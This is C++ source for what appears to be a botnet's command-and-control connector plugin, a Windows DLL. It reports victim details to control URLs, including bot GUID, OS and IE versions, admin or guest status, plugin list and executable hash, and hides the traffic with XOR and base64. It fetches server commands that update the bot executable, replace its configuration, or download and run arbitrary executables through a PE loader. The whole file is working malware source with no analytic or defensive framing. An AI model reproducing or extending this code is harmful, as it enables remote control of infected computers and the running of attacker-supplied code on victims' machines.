#include "includes.h"

#include "debug.cpp"
#include "debugmem.cpp"
#include "thread.cpp"

#include "nomoremsvcrt/nomoremsvcrt.cpp"
// ~~~

#define BOT_MAX_NAME	80
#define BOT_MIN_NAME	7
#define update					"UPDATE<br>"
#define updcfg					"UPDATE_CONFIG"
#define load					"LOAD<br>"

#define	check(command, smth)	strlen(command) > sizeof(smth) - 1 && !memcmp(command, smth, sizeof(smth) - 1)

typedef BOOL (__cdecl *GETPAGE2)(IN PCHAR szUrl, IN PCHAR szVerb, IN PCHAR szRequestHeaders, IN BOOL bReadResponseHeaders, IN LPVOID lpOptional, DWORD dwOptionalLength, OUT PBYTE *pbData, OUT PDWORD dwSize);
GETPAGE2 gl_lpGetPage2 = NULL;

typedef VOID (*FREEMEM)(IN LPVOID lpMem);
FREEMEM gl_FreeMem = NULL;

CHAR gl_szBotName[BOT_MAX_NAME];
DWORD gl_dwBotVersion;

typedef BOOL (__cdecl *GETCONFIGCRC32)(OUT PDWORD pdwCrc32);
GETCONFIGCRC32 gl_GetConfigCrc32;

typedef BOOL (__cdecl *GETBOTEXEMD5)(OUT PCHAR szMd5);
GETBOTEXEMD5 gl_GetBotExeMd5;

typedef BOOL (__cdecl *GETPLUGINSLIST)(OPTIONAL OUT PCHAR szPluginsList, IN OUT PDWORD pdwSize, OPTIONAL OUT PBOOL pblPluginsStat, IN OUT PDWORD pdwSizeStat);
GETPLUGINSLIST gl_GetPluginsList;

typedef VOID (__cdecl *MAINCPGATEOUTPUT)(IN PBYTE pbData, IN DWORD dwSize);
MAINCPGATEOUTPUT gl_MainCpGateOutput;

typedef VOID (__cdecl *UPDATEBOTEXE)(IN PBYTE pbData, IN DWORD dwSize, IN BOOL bUseBuildinPeLoader, IN BOOL bReplaceBotExe, IN DWORD dwTaskId);
UPDATEBOTEXE gl_UpdateBotExe;

typedef VOID (__cdecl *UPDATECONFIG)(IN PBYTE pbData, IN DWORD dwSize, IN DWORD dwTaskId);
UPDATECONFIG gl_UpdateConfig;

typedef VOID (__cdecl *STARTEXE)(IN PBYTE pbData, IN DWORD dwSize, IN BOOL bUseBuildinPeLoader, IN DWORD dwTaskId);
STARTEXE gl_StartExe;

// ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

char headers[] = "Content-Type: application/x-www-form-urlencoded\r\n";
DWORD gl_dwWakeTime = 0;

BOOL APIENTRY DllMain(IN HINSTANCE hDllHandle, IN DWORD nReason, IN LPVOID Reserved)
{
	switch (nReason)
	{
	case DLL_PROCESS_ATTACH:
		break;
	}
    return TRUE;
}

HANDLE gl_hConnector;
DWORD WINAPI ThreadConnector( IN LPVOID lpParameter );

CHAR gl_szCurrentUrl[0x500];

BOOL gl_bKeepAlive, gl_bStopConnector;

DLLEXPORT BOOL Init(char *szConfig)
{
	DebugEnter("");

	if (!szConfig || !gl_lpGetPage2 || !gl_MainCpGateOutput)
		return FALSE;

	ZeroMemory(gl_szCurrentUrl, sizeof(gl_szCurrentUrl));

	gl_bKeepAlive = FALSE;
	gl_bStopConnector = FALSE;

	gl_hConnector = StartThread(ThreadConnector, (PVOID)_xstrdup(szConfig), FALSE);

	DebugLeave("");

	return TRUE;
}

DLLEXPORT BOOL Start()
{
	return TRUE;
}

DLLEXPORT BOOL Stop()
{
	DebugEnter("");

	if (!/*TerminateThread*/StopThread(gl_hConnector, 0))
		DebugWrite("[ERROR] : TerminateThread fails?");

	DebugLeave("");

	return TRUE;
}

DLLEXPORT VOID TakeGetPage2(IN LPVOID lpFunc)
{
	gl_lpGetPage2 = (GETPAGE2)lpFunc;
}

DLLEXPORT VOID TakeUpdateBotExe(IN LPVOID lpFunc)
{
	gl_UpdateBotExe = (UPDATEBOTEXE)lpFunc;
}

DLLEXPORT VOID TakeUpdateConfig(IN LPVOID lpFunc)
{
	gl_UpdateConfig = (UPDATECONFIG)lpFunc;
}

DLLEXPORT VOID TakeStartExe(IN LPVOID lpFunc)
{
	gl_StartExe = (STARTEXE)lpFunc;
}

DLLEXPORT VOID TakeBotGuid(IN PCHAR szBotGuid)
{
	strcpy(gl_szBotName, "UNKNOWN!UNKNOWN!UNKNOWN");
	if ( checkmem_forread(szBotGuid, BOT_MIN_NAME) )
	{
		_strcpy_s(gl_szBotName, sizeof(gl_szBotName), szBotGuid);
	}
}

DLLEXPORT VOID TakeFreeMem(IN LPVOID lpFreeMemFunc)
{
	gl_FreeMem = (FREEMEM)lpFreeMemFunc;
}

DLLEXPORT VOID TakeBotVersion(IN DWORD dwBotVersion)
{
	gl_dwBotVersion = dwBotVersion;
}

DLLEXPORT VOID TakeConfigCrc32Callback(IN LPVOID lpFunc)
{
	gl_GetConfigCrc32 = (GETCONFIGCRC32)lpFunc;
}

DLLEXPORT VOID TakeBotExeMd5Callback(IN LPVOID lpFunc)
{
	gl_GetBotExeMd5 = (GETBOTEXEMD5)lpFunc;
}

DLLEXPORT VOID TakePluginsListCallback(IN LPVOID lpFunc)
{
	gl_GetPluginsList = (GETPLUGINSLIST)lpFunc;
}

DLLEXPORT VOID TakeMainCpGateOutputCallback(IN LPVOID lpFunc)
{
	gl_MainCpGateOutput = (MAINCPGATEOUTPUT)lpFunc;
}

DLLEXPORT VOID Uncontrollable()
{
}

// ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

BOOL ParseConfig(IN PCHAR pSource, OUT PCHAR **ppszUrls, OUT PDWORD *ppdwIntervals, OUT PDWORD pcnt)
{
	DebugEnter("");

	DWORD i;
	DWORD size;
	DWORD cnt;
	PCHAR pCurrent, pEnd;
	BOOL r = FALSE;

	do
	{
		// count of div
		size = strlen(pSource);
		for (i = 0, cnt = 0; i < size; i++)
		{
			if (pSource[i] == ';')
			{
				pSource[i] = '\0';
				cnt++;
			}
			else if(pSource[i] == '\r' || pSource[i] == '\n')
			{
				pSource[i] = '\0';
			}
		}

		if (!cnt)
			break;

		// malloc
		*ppszUrls = (PCHAR *)malloc(cnt * sizeof(PCHAR));
		if (!*ppszUrls)
			break;
		*ppdwIntervals = (PDWORD)malloc(cnt * sizeof(DWORD));
		if (!*ppdwIntervals)
			break;

		// filling up
		for (i = 0, pCurrent = pSource, pEnd = pSource + size; i < cnt && pCurrent < pEnd; i++)
		{
			if (pCurrent[0] == '\0')
				pCurrent++;
			(*ppszUrls)[i] = pCurrent;
			pCurrent += strlen(pCurrent) + 1;
			(*ppdwIntervals)[i] = atoi(pCurrent);
			pCurrent += strlen(pCurrent) + 1;
		}

		r = TRUE;
	}
	while (FALSE);

	*pcnt = cnt;

	DebugLeave("");

	return r;
}

BOOL IsUserAdmin()
{
    BOOL Result;
    SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
    PSID AdministratorsGroup; 

    Result = AllocateAndInitializeSid(
        &NtAuthority,
        2,
        SECURITY_BUILTIN_DOMAIN_RID,
        DOMAIN_ALIAS_RID_ADMINS,
        0, 0, 0, 0, 0, 0,
        &AdministratorsGroup); 

    if (Result) 
    {
        if (!CheckTokenMembership( NULL, AdministratorsGroup, &Result))
		{
            Result = FALSE;
        }

        FreeSid(AdministratorsGroup); 
    }

    return Result;
}

typedef BOOL (STDAPICALLTYPE *CREATEWELLKNOWNSID)(
  WELL_KNOWN_SID_TYPE WellKnownSidType, PSID DomainSid, PSID pSid, DWORD* cbSid
);

BOOL IsUserGuest()
{
    BOOL Result = FALSE;
    SID_IDENTIFIER_AUTHORITY NtAuthority = SECURITY_NT_AUTHORITY;
    PSID GuestsGroup = NULL;
	DWORD cbSid;
	PSID DomainSid = NULL;
	SID_NAME_USE SidType;
	LPTSTR ReferencedDomainName = NULL;
	DWORD cbReferencedDomainName = 0;
	CHAR szComputerName[MAX_COMPUTERNAME_LENGTH+1];
	DWORD dwSize = sizeof(szComputerName);

	// Computer Name
	if( !GetComputerName(szComputerName, &dwSize) )
		goto L_CLEANUP;
	// Account Name
	LookupAccountName( NULL, szComputerName, NULL, &cbSid, NULL, &cbReferencedDomainName, &SidType );
	if ( !(ReferencedDomainName = (LPTSTR)malloc( cbReferencedDomainName * sizeof(CHAR))) )
		goto L_CLEANUP;
	if ( !(DomainSid = (PSID)malloc( cbSid )) )
		goto L_CLEANUP;
	if ( !LookupAccountName( NULL, szComputerName, DomainSid, &cbSid, ReferencedDomainName, &cbReferencedDomainName, &SidType) )
		goto L_CLEANUP;
	// Getting Guest's SID
	cbSid = SECURITY_MAX_SID_SIZE;
	if( !(GuestsGroup = LocalAlloc(LMEM_FIXED, cbSid)) )
		goto L_CLEANUP;
	// CreateWellKnownSid is only in WinXP (via MSDN)
	CREATEWELLKNOWNSID Real_CreateWellKnownSid = (CREATEWELLKNOWNSID)GetProcAddress(LoadLibrary("Advapi32.dll"), "CreateWellKnownSid");
	if (!Real_CreateWellKnownSid)
		goto L_CLEANUP;
	Result = Real_CreateWellKnownSid(WinAccountGuestSid, DomainSid, GuestsGroup, &cbSid);
	// Check if user is Guest
	if (Result) 
		CheckTokenMembership(NULL, GuestsGroup, &Result);

L_CLEANUP:
	if (GuestsGroup)
		LocalFree( GuestsGroup );
	if (DomainSid)
		free((void *)DomainSid);
	if (ReferencedDomainName)
	{
		LPVOID lpMem = (void *)ReferencedDomainName;
		free(lpMem);
	}

    return Result;
}

DWORD gl_dwConfigCrc32 = 0;
CHAR gl_szBotExeMd5[33] = {0};
CHAR gl_szUserType[6];

BOOL GetClientData(OUT PCHAR szData, OUT PDWORD pdwSize, IN DWORD dwWakeTime)
{
	DebugEnter("");

	CHAR szFormatString[] = { "guid=%s&ver=%u&ie=%s&os=%u.%u.%u&ut=%s&ccrc=%08X&md5=%s&plg=%s&plgstat=%s&wake=%u" };
	CHAR ie[64] = {0};
	DWORD size, type;
	OSVERSIONINFO vi = {0};
	PCHAR szPluginsList = NULL;
	DWORD dwPluginsListSize = 0;
	PBOOL pblPluginsStat = NULL;
	DWORD dwPluginsStatSize = 0;
	PCHAR szPluginsStat = NULL;
	DWORD i;

	if (!*pdwSize)
		return FALSE;

	// ie
	size = sizeof(ie);
	type = REG_SZ;
	if (!SHGetValue(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Internet Explorer", "Version", &type, ie, &size) == ERROR_SUCCESS)
	{
		DebugWrite("[ERROR] : Cannot get IE version?");
	}

	// os
	vi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
	if (!GetVersionEx(&vi))
	{
		DebugWrite("[ERROR] : GetVersionEx() fails?");
	}

	// ccrc
	if ( gl_GetConfigCrc32 && !gl_dwConfigCrc32 )
		gl_GetConfigCrc32(&gl_dwConfigCrc32);

	// md5
	if ( gl_GetBotExeMd5 && !strlen(gl_szBotExeMd5) )
		gl_GetBotExeMd5(gl_szBotExeMd5);

	// plugins list
	do
	{
		if ( !gl_GetPluginsList )
			break;

		if (!gl_GetPluginsList(NULL, &dwPluginsListSize, NULL, &dwPluginsStatSize))
			break;

		szPluginsList = (PCHAR)malloc(dwPluginsListSize);
		if (!szPluginsList)
			break;

		pblPluginsStat = (PBOOL)malloc(dwPluginsStatSize);
		if (!pblPluginsStat)
			break;

		if (!gl_GetPluginsList(szPluginsList, &dwPluginsListSize, pblPluginsStat, &dwPluginsStatSize))
			break;

		// convert BOOL array into CHAR array
		if (dwPluginsStatSize)
		{
			szPluginsStat = (PCHAR)malloc(dwPluginsStatSize * 2 + 1);
			if (szPluginsStat)
			{
				szPluginsStat[0] = '\0';
				for ( i = 0; i < dwPluginsStatSize; i++ )
				{
					_snprintf(szPluginsStat + strlen(szPluginsStat), dwPluginsStatSize * 2, "%s;", pblPluginsStat[i] ? "1" : "0");
				}
				szPluginsStat[ strlen(szPluginsStat) - 1 ] = '\0';
			}
		}

		free(pblPluginsStat);
	}
	while (FALSE);

	// user type
	if (!strlen(gl_szUserType))
		strcpy(gl_szUserType, IsUserAdmin() ? "Admin" : IsUserGuest() ? "Guest" : "User");

	// making it
	_snprintf(szData, *pdwSize - 1, szFormatString,
		// guid
		gl_szBotName,
		// ver
		gl_dwBotVersion,
		// ie
		ie,
		// os
		vi.dwMajorVersion, vi.dwMinorVersion, vi.dwBuildNumber,
		// ut
		gl_szUserType,
		// ccrc
		gl_dwConfigCrc32,
		// md5
		gl_szBotExeMd5,
		// plg
		szPluginsList ? szPluginsList : "",
		// plgstat
		szPluginsStat ? szPluginsStat : "",
		// wake interval
		dwWakeTime
		);
	szData[*pdwSize - 1] = '\0';
	*pdwSize = strlen(szData);

	free(szPluginsList);
	free(szPluginsStat);

	DebugLeave("szData = { %s }", szData ? szData : "null");

	return TRUE;
}

// ~~~

static const char base64_chars[] = {
	"ABCDEFGHIJKLMNOPQRSTUVWXYZ" \
	"abcdefghijklmnopqrstuvwxyz" \
	"0123456789+/" };

static inline bool is_base64(unsigned char c) {
	return (isalnum(c) || (c == '+') || (c == '/'));
}

int base64_decode(char* encoded_string, int in_len, char* ret) 
{
	int i = 0;
	int j = 0;
	int k = 0;
	int in_ = 0;
	unsigned char char_array_4[4], char_array_3[3];
	int iret = 0;

	while (in_len-- && ( encoded_string[in_] != '=') && is_base64(encoded_string[in_])) {
		char_array_4[i++] = encoded_string[in_]; in_++;
		if (i == 4) {
			for (i = 0; i <4; i++)
				for (j = 0; j < sizeof base64_chars - 1; j++)
					if (char_array_4[i] == base64_chars[j]) {
						char_array_4[i] = (unsigned char)j;
						break;
					}

					char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4);
					char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2);
					char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3];

					for (i = 0; (i < 3); i++)
						ret[iret++] = char_array_3[i];
					i = 0;
		}
	}

	if (i) {
		for (j = i; j <4; j++)
			char_array_4[j] = 0;

		for (j = 0; j <4; j++)
			for (k = 0; k < sizeof base64_chars - 1; k++)
				if (char_array_4[j] == base64_chars[k]) {
					char_array_4[j] = (unsigned char)k;
					break;
				}

				char_array_3[0] = (char_array_4[0] << 2) + ((char_array_4[1] & 0x30) >> 4);
				char_array_3[1] = ((char_array_4[1] & 0xf) << 4) + ((char_array_4[2] & 0x3c) >> 2);
				char_array_3[2] = ((char_array_4[2] & 0x3) << 6) + char_array_4[3];

				for (j = 0; (j < i - 1); j++) ret[iret++] = char_array_3[j];
	}
	ret[iret] = '\0';
	return iret;
}

int base64_encode(char const* bytes_to_encode, unsigned int in_len, char *ret) 
{
	int i = 0;
	int j = 0;
	int ret_i = 0;
	unsigned char char_array_3[3];
	unsigned char char_array_4[4];

	while (in_len--)
	{
		char_array_3[i++] = *(bytes_to_encode++);
		if (i == 3) {
			char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
			char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
			char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6);
			char_array_4[3] = char_array_3[2] & 0x3f;

			for(i = 0; (i <4) ; i++)
				ret[ret_i++] = base64_chars[char_array_4[i]];
			i = 0;
		}
	}

	if (i)
	{
		for(j = i; j < 3; j++)
			char_array_3[j] = '\0';

		char_array_4[0] = (char_array_3[0] & 0xfc) >> 2;
		char_array_4[1] = ((char_array_3[0] & 0x03) << 4) + ((char_array_3[1] & 0xf0) >> 4);
		char_array_4[2] = ((char_array_3[1] & 0x0f) << 2) + ((char_array_3[2] & 0xc0) >> 6);
		char_array_4[3] = char_array_3[2] & 0x3f;

		for (j = 0; (j < i + 1); j++)
			ret[ret_i++] = base64_chars[char_array_4[j]];

		while((i++ < 3)) ret[ret_i] = '=';
	}
	ret[ret_i] = '\0';

	return ret_i;
}

// ~~~

VOID EncryptData( IN PCHAR pbData, IN DWORD len, IN DWORD start=0 )
{
    for(DWORD i=start; i<len; i++)
    {
		if( pbData[i] != 219 ) pbData[i] ^= 219;
    }
}

DWORD DecryptData( IN PCHAR pbData, IN DWORD len )
{
	DWORD dec_len = base64_decode(pbData, len, pbData);
	pbData[dec_len] = '\0';
    EncryptData( pbData, dec_len );
	return dec_len;
}

BOOL GetPeLoader( PCHAR cmd )
{
	BOOL res = FALSE;
	PCHAR peldr = strstr(cmd, "peldr=");
	if( peldr )
	{
		peldr += 6; 
		if( *peldr == '1') res = TRUE;
	}
	return res;
}

BOOL GetReplaceExe( PCHAR cmd )
{
	bool res = FALSE;
	PCHAR replexe = strstr(cmd, "justreplace=");
	if( replexe )
	{
		replexe += 12; 
		if( *replexe == '1') res = TRUE;
	}
	return res;
}

DWORD GetTaskId( PCHAR cmd )
{
    DWORD dwTaskId = 0;
    PCHAR tid = strstr(cmd, "<br>");
    if( tid )
    {
        tid += 4;
        sscanf(tid, "%u", &dwTaskId);
    }
    return dwTaskId;
}

DWORD WINAPI ThreadConnector( IN LPVOID lpParameter )
{
	DebugEnter("");

	PCHAR *pszUrls = NULL;
	PDWORD pdwIntervals = NULL;
	DWORD cnt, indx = 0;
	BOOL r;
	CHAR szClientData[0x100];
	DWORD size;
	CHAR szFullUrl[0x200];
	CHAR szPostData[0x400];
	CHAR szEncData[0x600];
	DWORD dwPostDataLen;
	DWORD dwEncDataLen;
	PBYTE pbGateData, pgd;
	DWORD dwGateDataSize;
	PCHAR command;
	PBYTE pbFileData;
	DWORD dwFileSize;
	BOOL bUseBuildinPeLoader;
	BOOL bReplaceBotExe;
	DWORD dwTaskId;
	

	do
	{
		r = ParseConfig((PCHAR)lpParameter, &pszUrls, &pdwIntervals, &cnt);

		if (!cnt || !r)
		{
			DebugWrite("[ERROR] : There are no valid urls");
			break;
		}

		gl_dwWakeTime = pdwIntervals[indx];

		do
		{
			do
			{
				// client data
				size = sizeof(szClientData);
				if (!GetClientData(szClientData, &size, pdwIntervals[indx]))
					break;

				// full url
				_snprintf(szFullUrl, sizeof(szFullUrl) - 1, "%s", pszUrls[indx]);
				szFullUrl[sizeof(szFullUrl) - 1] = '\0';
				
				// post data
				_snprintf(szPostData, sizeof(szPostData) - 1, "%s&stat=online", szClientData);
				dwPostDataLen = strlen(szPostData);
				szPostData[sizeof(szPostData) - 1] = '\0';

				// encoding
				EncryptData( szPostData, dwPostDataLen);
				// base64 encoding
				strcpy(szEncData, "data=");
				dwEncDataLen = base64_encode(szPostData, dwPostDataLen, szEncData + 5) + 5;

				// ...
				_strcpy_s(gl_szCurrentUrl, sizeof(gl_szCurrentUrl), pszUrls[indx]);

				// knock
				DebugWrite("[DEBUG] : szFullUrl = { %s }", szFullUrl);
				pbGateData = NULL;
				if (!gl_lpGetPage2(szFullUrl, "POST", headers, TRUE, szEncData, dwEncDataLen, &pbGateData, &dwGateDataSize))
				{
					// is there are internet connection ?
					if (!gl_lpGetPage2("http://www.microsoft.com", "GET", NULL, FALSE, NULL, NULL, &pbGateData, &dwGateDataSize))
					{
						DebugWrite("[WARNING] : Seems, there are no any internet connection");
						break;
					}
					// free some
					if (gl_FreeMem && pbGateData)
					{
						gl_FreeMem(pbGateData);
						pbGateData = NULL;
					}
					// next one
					DebugWrite("[WARNING] : Server is dead?");
					indx++;
					if (indx >= cnt)
						indx = 0;
					break;
				}

				DebugWrite("[DEBUG] : pbGateData(%u) = { %s }", dwGateDataSize, (PCHAR)pbGateData ? (PCHAR)pbGateData : "null");
				// sending data to bot
				// OLD CODE : gl_MainCpGateOutput(pbGateData, dwGateDataSize);
				if( (pbGateData != NULL) && strlen((PCHAR)pbGateData) > 12 )
				{
					if (	!memcmp(pbGateData + 9, "404", 3)
						||	!memcmp(pbGateData + 9, "50", 2)
						)
					{
						DebugWrite("[ERROR] : HTTP 404 or HTTP 50x status");
						indx++;
						if (indx >= cnt)
							indx = 0;
						break;
					}
					else
					{
						pgd = (PBYTE)strstr((PCHAR)pbGateData, "\r\n\r\n");
						if ( (pgd != NULL) && strlen((PCHAR)pgd) > 4)
						{
							pgd += 4;

							// decoding data
							dwGateDataSize = DecryptData( (PCHAR)pgd, dwGateDataSize );

							for(UINT i=0; i < dwGateDataSize; i++)
							{
								if( pgd[i] == '\n' )
								{
									pgd[i] = '\0';
									break;
								}
							}
							command = (PCHAR)pgd;
							DebugWrite("[CMD] : %s", command);

							dwTaskId = GetTaskId(command);
							dwFileSize = dwGateDataSize - strlen(command) - 1;
							pbFileData = pgd + strlen(command) + 1;

							if( (int)dwFileSize > 0 )
							{
								if( check(command, update) )
								{
									bUseBuildinPeLoader = GetPeLoader(command);
									bReplaceBotExe = GetReplaceExe(command);
									DebugWrite("[DEBUG] : UpdateBotExe() calling ...");
									gl_bKeepAlive = TRUE;
									gl_UpdateBotExe(pbFileData, dwFileSize, bUseBuildinPeLoader, bReplaceBotExe, dwTaskId);
									gl_bKeepAlive = FALSE;
									DebugWrite("[DEBUG] : UpdateBotExe dwFileSize(%u)", dwFileSize);
								}
								else if( check(command, updcfg) )
								{
									DebugWrite("[DEBUG] : UpdateConfig() calling ...");
									gl_bKeepAlive = TRUE;
									gl_UpdateConfig(pbFileData, dwFileSize, dwTaskId);
									gl_bKeepAlive = FALSE;
									DebugWrite("[DEBUG] : UpdateConfig dwFileSize(%u)", dwFileSize);
								}
								else if( check(command, load) )
								{
									bUseBuildinPeLoader = GetPeLoader(command);
									DebugWrite("[DEBUG] : StartExe() calling ...");
									gl_StartExe(pbFileData, dwFileSize, bUseBuildinPeLoader, dwTaskId);
									DebugWrite("[DEBUG] : StartExe dwFileSize(%u)", dwFileSize);
								}
								else gl_MainCpGateOutput(pgd, dwGateDataSize);
							}
							else gl_MainCpGateOutput(pgd, dwGateDataSize);
						}
						else
						{
							if (!pgd)
								DebugWrite("[ERROR] : Invalid response from webserver");
						}
					}
				}
			}
			while (FALSE);

			if (gl_FreeMem && pbGateData)
			{
				gl_FreeMem(pbGateData);
				pbGateData = NULL;
			}
			else if (!gl_FreeMem)
				DebugWrite("[WARNING] : Cannot free mem");

			if (gl_bStopConnector)
				break;

			DebugWrite("[DEBUG] : Sleep(%u)", pdwIntervals[indx] * 1000);
			Sleep(pdwIntervals[indx] * 1000); // msec to sec
		}
		while (TRUE);

	}
	while (FALSE);

	DebugLeave("");

	// TODO: Fix resource leaks
	free(pszUrls);
	free(pdwIntervals);
	free(lpParameter);

	return 0;
}

// ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

DLLEXPORT VOID MainCpGateInput(IN PBYTE pbData, IN DWORD dwSize)
{
	DebugEnter("");

	CHAR szClientData[0x100];
	DWORD size;
	CHAR szFullUrl[0x200];
	CHAR szPostData[0x200];
	CHAR szEncData[0x300];
	DWORD dwPostDataLen;
	DWORD dwEncDataLen;
	PBYTE pbGateData;
	DWORD dwGateDataSize;
	
	do
	{
		pbGateData = NULL;

		// client data
		size = sizeof(szClientData);
		if (!GetClientData(szClientData, &size, gl_dwWakeTime))
			break;

		_snprintf(szFullUrl, sizeof(szFullUrl) - 1, "%s", gl_szCurrentUrl);
		szFullUrl[sizeof(szFullUrl) - 1] = '\0';

		_snprintf(szPostData, sizeof(szPostData) - 1, "%s&%s", szClientData, (PCHAR)pbData);
		dwPostDataLen = strlen(szPostData);
		szPostData[sizeof(szPostData) - 1] = '\0';

		DebugWrite("[DEBUG] : data { %s }", szPostData);

		// encoding post data
		EncryptData( szPostData, dwPostDataLen);
		// base64 encoding
		strcpy(szEncData, "data=");
		dwEncDataLen = base64_encode(szPostData, dwPostDataLen, szEncData + 5) + 5;

		// knock
		if (!gl_lpGetPage2(szFullUrl, "POST", headers, FALSE, szEncData, dwEncDataLen, &pbGateData, &dwGateDataSize))
			break;
	}
	while (FALSE);

	free(pbGateData);

	DebugLeave("");
}

// ~~~

DLLEXPORT BOOL KeepAlive()
{
	gl_bStopConnector = TRUE;
	return gl_bKeepAlive;
}